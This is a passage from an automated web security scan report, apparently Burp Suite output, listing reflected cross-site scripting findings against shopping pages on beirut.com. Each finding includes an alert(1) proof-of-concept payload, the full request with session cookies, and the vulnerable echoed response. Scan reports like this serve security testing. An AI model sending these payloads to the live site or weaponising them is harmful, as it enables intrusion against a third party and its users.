Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping64df5"><a>b0140b06081">
...[SNIP]...

4.965. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b5f7'-alert(1)-'3728ef0c51a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping4b5f7'-alert(1)-'3728ef0c51a/Equipment-Gadgets/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping4b5f7'-alert(1)-'3728ef0c51a/Equipment-Gadgets/339412286/Stationery/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.966. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28afb<script>alert(1)</script>a7f04d8fbe5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgets28afb<script>alert(1)</script>a7f04d8fbe5/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgets28afb<script>alert(1)</script>a7f04d8fbe5 <a href="#" id="backlink">
...[SNIP]...

4.967. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d129a'-alert(1)-'090fd3b749c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgetsd129a'-alert(1)-'090fd3b749c/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgetsd129a'-alert(1)-'090fd3b749c/339412286/Stationery/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.968. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65c91'-alert(1)-'1a2b3466890 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/33941228665c91'-alert(1)-'1a2b3466890/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets/33941228665c91'-alert(1)-'1a2b3466890/Stationery/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.969. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da2d'-alert(1)-'b38aa5a5835 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Stationery5da2d'-alert(1)-'b38aa5a5835/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Equipment-Gadgets/339412286/Stationery5da2d'-alert(1)-'b38aa5a5835/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.970. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e9c7'-alert(1)-'1bbc135ed4c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Stationery/643e9c7'-alert(1)-'1bbc135ed4c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:25:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets/339412286/Stationery/643e9c7'-alert(1)-'1bbc135ed4c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.971. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8746d'-alert(1)-'39fe49f3abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping8746d'-alert(1)-'39fe49f3abb/Home-Furnishings/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:38:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping8746d'-alert(1)-'39fe49f3abb/Home-Furnishings';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.972. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d794"><a>5692be18d18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping5d794"><a>5692be18d18/Home-Furnishings/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping5d794"><a>5692be18d18">
...[SNIP]...

4.973. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f959d'-alert(1)-'0fcd73ab29f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingsf959d'-alert(1)-'0fcd73ab29f/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishingsf959d'-alert(1)-'0fcd73ab29f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.974. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2798b<script>alert(1)</script>e80285ad017 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings2798b<script>alert(1)</script>e80285ad017/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:42:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings2798b<script>alert(1)</script>e80285ad017 <a href="#" id="backlink">
...[SNIP]...

4.975. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d6f"><a>e3a5616e2bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping44d6f"><a>e3a5616e2bd/Home-Furnishings/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:04:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping44d6f"><a>e3a5616e2bd">
...[SNIP]...

4.976. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 410d3'-alert(1)-'a317e9c2aac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping410d3'-alert(1)-'a317e9c2aac/Home-Furnishings/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:10:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping410d3'-alert(1)-'a317e9c2aac/Home-Furnishings/4120758082/Antiques-Collectibles/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.977. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ce98<script>alert(1)</script>c2ed3248485 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings8ce98<script>alert(1)</script>c2ed3248485/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
